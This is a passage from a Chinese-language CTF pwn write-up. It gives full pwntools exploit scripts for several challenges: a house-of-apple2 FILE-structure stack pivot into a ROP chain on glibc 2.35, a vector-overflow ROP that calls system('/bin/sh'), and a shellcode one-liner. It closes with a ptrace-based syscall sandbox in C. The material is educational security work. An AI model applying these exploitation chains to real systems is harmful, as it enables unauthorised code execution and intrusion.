      <span class="k">goto</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">WIFSTOPPED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">WSTOPSIG</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">==</span> <span class="n">SIGSEGV</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">goto</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">WIFEXITED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">))</span> <span class="p">{</span>
      <span class="k">goto</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="nl">ret:</span>
  <span class="k">return</span> <span class="n">stat_loc</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>进行完备的检查后，子进程的 <code class="language-plaintext highlighter-rouge">asm("INT3")</code> 也无法逃出沙盒。加强后的 ptrace 沙盒放在文末以供参考。</p>

<h3 id="利用">利用</h3>

<p>题目本身提供了两次相对于栈的任意地址读（8 字节），一次相对于栈的任意地址写（8 字节），此外还有一个位于栈上大小 0x200 的 buffer 可以写入一些数据。</p>

<p>由于任意写只有 8 字节，所以本题不能像栈溢出一样把 <code class="language-plaintext highlighter-rouge">saved rbp</code> 和返回地址都覆盖以后通过 <code class="language-plaintext highlighter-rouge">leave; ret;</code> 栈迁移打 ROP。可恶的出题人必须要让我们绕一个弯子。</p>

<p>本文采用比较常规的做法，在泄露 libc 基地址以及栈上 buffer 的位置后，借助 house of apple2 来打 stack pivot。</p>

<p>在 2.35 以前的 GLIBC 版本中，有一段被称为 magic gadget 的代码可以方便地结合 FILEIO 利用完成栈迁移：</p>

<pre><code class="language-asm">; svcudp_reply+26
mov rbp, qword ptr [rdi + 0x48];
mov rax, qword ptr [rbp + 0x18]; 
lea r13, [rbp + 0x10]; 
mov dword ptr [rbp + 0x10], 0; 
mov rdi, r13; 
call qword ptr [rax + 0x28];
</code></pre>

<p>很可惜这段代码在题目使用的 2.35 版本中消失了，但还是有一个技巧可以完成栈迁移。在包括 <code class="language-plaintext highlighter-rouge">puts</code> 在内的一些 FILEIO 类函数中有一个加速—— <code class="language-plaintext highlighter-rouge">rbp</code> 寄存器会始终指向当前正在处理的 FILE 结构体。（类似于 gs 寄存器始终指向 TLS 结构体）</p>

<p>我们可以在 FILE 结构体的开头布置一条简单的 ROP 链。在 house of apple2 劫持控制流执行 <code class="language-plaintext highlighter-rouge">leave; ret;</code> 之后，<code class="language-plaintext highlighter-rouge">rsp</code> 就会指向 FILE 结构体 +8 的位置，开始执行我们布置的 ROP 链。</p>

<p>exp 脚本如下：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">pwn</span><span class="p">():</span>
    
    <span class="c1"># 0x00000000000c6d6e : int1 ; ret
</span>    <span class="c1"># 0x000000000002a3e5 : pop rdi ; ret
</span>    <span class="c1"># 0x000000000002a2e0 : pop rbp ; ret
</span>    <span class="c1"># 0x000000000004da83 : leave ; ret
</span>
    <span class="n">int1</span> <span class="o">=</span> <span class="mh">0xc6d6e</span>
    <span class="n">pop_rdi</span> <span class="o">=</span> <span class="mh">0x2a3e5</span>
    <span class="n">pop_rbp</span> <span class="o">=</span> <span class="mh">0x2a2e0</span>
    <span class="n">leave_ret</span> <span class="o">=</span> <span class="mh">0x4da83</span>

	<span class="c1"># leak libc
</span>    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">one &gt;</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">2</span><span class="sh">'</span><span class="p">)</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">which one?</span><span class="sh">'</span><span class="p">,</span> <span class="nf">str</span><span class="p">(</span><span class="n">bias_base</span><span class="o">+</span><span class="mi">37</span><span class="p">).</span><span class="nf">encode</span><span class="p">())</span>
    <span class="nf">ru</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s"> = </span><span class="sh">'</span><span class="p">)</span>
    <span class="n">libc_base</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="nf">ru</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="se">\n</span><span class="sh">'</span><span class="p">),</span> <span class="mi">10</span><span class="p">)</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">libc_start_main_return</span>
    <span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">libc_base: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">)</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span>

	<span class="c1"># leak stack
</span>    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">one &gt;</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">2</span><span class="sh">'</span><span class="p">)</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">which one?</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">-4</span><span class="sh">'</span><span class="p">)</span>
    <span class="nf">ru</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s"> = </span><span class="sh">'</span><span class="p">)</span>
    <span class="n">stack</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="nf">ru</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="se">\n</span><span class="sh">'</span><span class="p">),</span> <span class="mi">10</span><span class="p">)</span>
    <span class="nb">buffer</span> <span class="o">=</span> <span class="n">stack</span> <span class="o">-</span> <span class="mh">0x30</span> <span class="o">-</span> <span class="mh">0x220</span>
    <span class="n">array_base</span> <span class="o">=</span> <span class="n">stack</span> <span class="o">-</span> <span class="mh">0x20</span>
    <span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">stack: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">stack</span><span class="p">)</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span>
    <span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">buffer: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="nb">buffer</span><span class="p">)</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span>
    <span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">array_base: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">array_base</span><span class="p">)</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span>

    <span class="n">rop_chain</span> <span class="o">=</span> <span class="nf">flat</span><span class="p">([</span>
        <span class="mh">0xdeadbeef</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="n">int1</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="n">pop_rdi</span><span class="p">,</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="nf">next</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">/bin/sh</span><span class="sh">'</span><span class="p">)),</span>
        <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">'</span><span class="s">system</span><span class="sh">'</span><span class="p">],</span>
        <span class="mh">0x0</span><span class="p">,</span>
    <span class="p">])</span>

    <span class="n">null_ptr</span> <span class="o">=</span> <span class="nb">buffer</span> <span class="o">+</span> <span class="mh">0x28</span>
    <span class="n">fs_addr</span> <span class="o">=</span> <span class="nb">buffer</span> <span class="o">+</span> <span class="nf">len</span><span class="p">(</span><span class="n">rop_chain</span><span class="p">)</span> <span class="c1"># pos of the fake FS
</span>
    <span class="n">fs</span> <span class="o">=</span> <span class="nf">flat</span><span class="p">({</span>
        <span class="mh">0x00</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="c1"># flags
</span>        <span class="mh">0x08</span><span class="p">:</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">pop_rbp</span><span class="p">,</span> <span class="c1"># _IO_read_ptr
</span>        <span class="mh">0x10</span><span class="p">:</span> <span class="nb">buffer</span><span class="p">,</span> <span class="c1"># _IO_read_end
</span>        <span class="mh">0x18</span><span class="p">:</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">leave_ret</span><span class="p">,</span> <span class="c1"># _IO_read_base
</span>        <span class="mh">0x88</span><span class="p">:</span> <span class="n">null_ptr</span><span class="p">,</span> <span class="c1"># _lock
</span>        <span class="mh">0xa0</span><span class="p">:</span> <span class="n">fs_addr</span> <span class="o">+</span> <span class="mh">0xf0</span> <span class="o">-</span> <span class="mh">0xe0</span><span class="p">,</span> <span class="c1"># _wide_data
</span>        <span class="mh">0xa8</span><span class="p">:</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">leave_ret</span><span class="p">,</span>
        <span class="mh">0xd8</span><span class="p">:</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">'</span><span class="s">_IO_wfile_jumps</span><span class="sh">'</span><span class="p">]</span> <span class="o">+</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x18</span> <span class="o">-</span> <span class="mh">0x38</span><span class="p">,</span> <span class="c1"># vtable
</span>        <span class="mh">0xf0</span><span class="p">:</span> <span class="n">fs_addr</span> <span class="o">+</span> <span class="mh">0xa8</span> <span class="o">-</span> <span class="mh">0x68</span><span class="p">,</span>
    <span class="p">})</span>

    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">one &gt;</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">1</span><span class="sh">'</span><span class="p">)</span>
    <span class="nf">sa</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">recv:</span><span class="sh">'</span><span class="p">,</span> <span class="n">rop_chain</span> <span class="o">+</span> <span class="n">fs</span><span class="p">)</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">which one?</span><span class="sh">'</span><span class="p">,</span> <span class="nf">str</span><span class="p">((</span><span class="n">libc_base</span><span class="o">+</span><span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">'</span><span class="s">stdout</span><span class="sh">'</span><span class="p">]</span><span class="o">-</span><span class="n">array_base</span><span class="p">)</span><span class="o">//</span><span class="mi">8</span><span class="p">).</span><span class="nf">encode</span><span class="p">())</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">value?</span><span class="sh">'</span><span class="p">,</span> <span class="nf">str</span><span class="p">(</span><span class="n">fs_addr</span><span class="p">).</span><span class="nf">encode</span><span class="p">())</span>

    <span class="n">io</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>

</code></pre></div></div>

<h2 id="vpwn">vpwn</h2>

<p>题目实现了一个简易的 vector 结构体，类似：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">vec</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">data</span><span class="p">[</span><span class="mi">6</span><span class="p">],</span>
	<span class="kt">size_t</span> <span class="n">length</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>

<p>通过菜单提供了以下几个功能：</p>

<ul>
  <li>Edit：编辑某个已有元素</li>
  <li>Pop：弹出一个元素</li>
  <li>Push：压入一个元素（存在漏洞：没有对总长度作限制）</li>
  <li>Print：打印所有元素</li>
</ul>

<p>在 6 次 Push 后，第七和第八次 push 即可覆盖 length，而后就可以通过 print 泄露栈上的各种数据，并用 edit 编辑返回地址，打 ROP。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ru</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">r</span>   <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span>      <span class="n">io</span><span class="p">.</span><span class="nf">recv</span><span class="p">()</span>
<span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span>   <span class="n">io</span><span class="p">.</span><span class="nf">sendlineafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
<span class="n">sa</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span>   <span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
<span class="n">sl</span>  <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">s</span>   <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span>     <span class="n">io</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">edit</span><span class="p">(</span><span class="nb">id</span><span class="p">,</span> <span class="n">val</span><span class="p">):</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">choice: </span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">1</span><span class="sh">'</span><span class="p">)</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">index</span><span class="sh">'</span><span class="p">,</span> <span class="nf">str</span><span class="p">(</span><span class="nb">id</span><span class="p">))</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">value: </span><span class="sh">'</span><span class="p">,</span> <span class="nf">str</span><span class="p">(</span><span class="n">val</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">push</span><span class="p">(</span><span class="n">val</span><span class="p">):</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">choice: </span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">2</span><span class="sh">'</span><span class="p">)</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">value</span><span class="sh">'</span><span class="p">,</span><span class="nf">str</span><span class="p">(</span><span class="n">val</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">pop</span><span class="p">():</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">choice: </span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">3</span><span class="sh">'</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">printv</span><span class="p">():</span>
    <span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">choice: </span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">4</span><span class="sh">'</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">pwn</span><span class="p">():</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">6</span><span class="p">):</span>
        <span class="nf">push</span><span class="p">(</span><span class="mh">0x100</span><span class="p">)</span>
    <span class="nf">push</span><span class="p">(</span><span class="mh">0x30</span><span class="p">)</span>
    <span class="nf">printv</span><span class="p">()</span>

    <span class="nf">ru</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">contents: </span><span class="sh">'</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">18</span><span class="p">):</span>
        <span class="nf">ru</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s"> </span><span class="sh">'</span><span class="p">)</span>

    <span class="n">libc_base</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="nf">ru</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s"> </span><span class="sh">'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="nf">decode</span><span class="p">())</span> <span class="o">+</span> <span class="p">(</span><span class="nf">int</span><span class="p">(</span><span class="nf">ru</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s"> </span><span class="sh">'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="nf">decode</span><span class="p">())</span><span class="o">&lt;&lt;</span><span class="mi">32</span><span class="p">)</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">libc_start_main_return</span>
    <span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">libc_base: </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">)</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span>

    <span class="c1">#one_gadget = libc_base + 0xebd43
</span>    <span class="c1">#info(f'one_gadget: {hex(one_gadget)}')
</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x0000000000029139</span>
    <span class="n">pop_rdi</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x000000000002a3e5</span>
    <span class="n">binsh</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="nf">next</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">/bin/sh</span><span class="sh">'</span><span class="p">))</span>
    <span class="n">system</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="sh">'</span><span class="s">system</span><span class="sh">'</span><span class="p">]</span>

    <span class="nf">edit</span><span class="p">(</span><span class="mi">18</span><span class="p">,</span> <span class="n">ret</span> <span class="o">&amp;</span> <span class="mh">0xffffffff</span><span class="p">)</span>
    <span class="nf">edit</span><span class="p">(</span><span class="mi">19</span><span class="p">,</span> <span class="n">ret</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span>
    <span class="nf">edit</span><span class="p">(</span><span class="mi">20</span><span class="p">,</span> <span class="n">pop_rdi</span> <span class="o">&amp;</span> <span class="mh">0xffffffff</span><span class="p">)</span>
    <span class="nf">edit</span><span class="p">(</span><span class="mi">21</span><span class="p">,</span> <span class="n">pop_rdi</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span>
    <span class="nf">edit</span><span class="p">(</span><span class="mi">22</span><span class="p">,</span> <span class="n">binsh</span> <span class="o">&amp;</span> <span class="mh">0xffffffff</span><span class="p">)</span>
    <span class="nf">edit</span><span class="p">(</span><span class="mi">23</span><span class="p">,</span> <span class="n">binsh</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span>
    <span class="nf">edit</span><span class="p">(</span><span class="mi">24</span><span class="p">,</span> <span class="n">system</span> <span class="o">&amp;</span> <span class="mh">0xffffffff</span><span class="p">)</span>
    <span class="nf">edit</span><span class="p">(</span><span class="mi">25</span><span class="p">,</span> <span class="n">system</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span>

    <span class="n">io</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>

</code></pre></div></div>

<h2 id="heavens-door">Heaven’s door</h2>

<p>神秘。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">pwn</span><span class="p">():</span>
	<span class="nf">sla</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">puchid:</span><span class="sh">"</span><span class="p">,</span> <span class="nf">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="p">.</span><span class="nf">sh</span><span class="p">()))</span>
</code></pre></div></div>

<h2 id="一个相对完善的-ptrace-sandbox">一个相对完善的 ptrace sandbox</h2>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
 * pt.c
 * Copyright (C) 2025 cameudis &lt;cameudis@gmail.com&gt;
 *
 * Distributed under terms of the MIT license.
 */</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/prctl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/ptrace.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/wait.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/user.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/syscall.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">break_syscall</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">pid</span><span class="p">,</span> <span class="k">struct</span> <span class="n">user_regs_struct</span> <span class="o">*</span><span class="n">regs</span><span class="p">){</span>
  <span class="kt">int</span> <span class="n">stat_loc</span><span class="p">;</span>
  <span class="k">do</span> <span class="p">{</span>
    <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_SYSCALL</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stat_loc</span><span class="p">,</span> <span class="n">__WALL</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">"waitpid error"</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">WIFSTOPPED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">WSTOPSIG</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">==</span> <span class="p">(</span><span class="n">SIGTRAP</span> <span class="o">|</span> <span class="mh">0x80</span><span class="p">))</span> <span class="p">{</span>
      <span class="k">goto</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">WIFSTOPPED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">WSTOPSIG</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">==</span> <span class="n">SIGSEGV</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">goto</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">WIFEXITED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">))</span> <span class="p">{</span>
      <span class="k">goto</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="nl">ret:</span>
  <span class="k">return</span> <span class="n">stat_loc</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[]){</span>
  <span class="k">struct</span> <span class="n">user_regs_struct</span> <span class="n">regs</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">stat_loc</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
  
  <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// child</span>

    <span class="c1">// waiting for parent to attach...</span>
    <span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_PDEATHSIG</span><span class="p">,</span> <span class="n">SIGKILL</span><span class="p">);</span>
    <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_TRACEME</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">mypid</span> <span class="o">=</span> <span class="n">getpid</span><span class="p">();</span>
    <span class="n">kill</span><span class="p">(</span><span class="n">mypid</span><span class="p">,</span> <span class="n">SIGSTOP</span><span class="p">);</span>

    <span class="c1">// do something...</span>
    <span class="n">asm</span><span class="p">(</span><span class="s">"int3"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo 'Hello, World!'"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// parent</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stat_loc</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">"waitpid error1"</span><span class="p">);</span>
    <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_SETOPTIONS</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">PTRACE_O_TRACESYSGOOD</span><span class="p">);</span>

    <span class="c1">// monitor syscall</span>
    <span class="k">do</span> <span class="p">{</span>
      <span class="c1">// wait child to stop at syscall</span>
      <span class="n">stat_loc</span> <span class="o">=</span> <span class="n">break_syscall</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>

      <span class="c1">// exit if child die</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">WIFEXITED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">||</span> <span class="n">WIFSTOPPED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">WSTOPSIG</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">==</span> <span class="n">SIGSEGV</span><span class="p">)</span>
        <span class="k">break</span><span class="p">;</span>

      <span class="c1">// perform check</span>
      <span class="k">if</span> <span class="p">(</span> <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_GETREGS</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"GETREGS error"</span><span class="p">);</span>
      <span class="kt">size_t</span> <span class="n">syscall_num</span> <span class="o">=</span> <span class="n">regs</span><span class="p">.</span><span class="n">orig_rax</span><span class="p">;</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"[*] Syscall number: %ld</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">syscall_num</span><span class="p">);</span>
      
      <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_read</span> <span class="o">||</span>
            <span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_write</span> <span class="o">||</span>
            <span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_fstat</span> <span class="o">||</span>
            <span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_exit</span> <span class="o">||</span>
            <span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_clock_nanosleep</span> <span class="o">||</span>
            <span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_exit_group</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"[*] Bad Syscall"</span><span class="p">);</span>
        <span class="n">regs</span><span class="p">.</span><span class="n">orig_rax</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span> <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_SETREGS</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span>
          <span class="n">puts</span><span class="p">(</span><span class="s">"SETREGS error"</span><span class="p">);</span>
        <span class="p">}</span>

      <span class="c1">// wait for syscall ret</span>
      <span class="n">stat_loc</span> <span class="o">=</span> <span class="n">break_syscall</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>

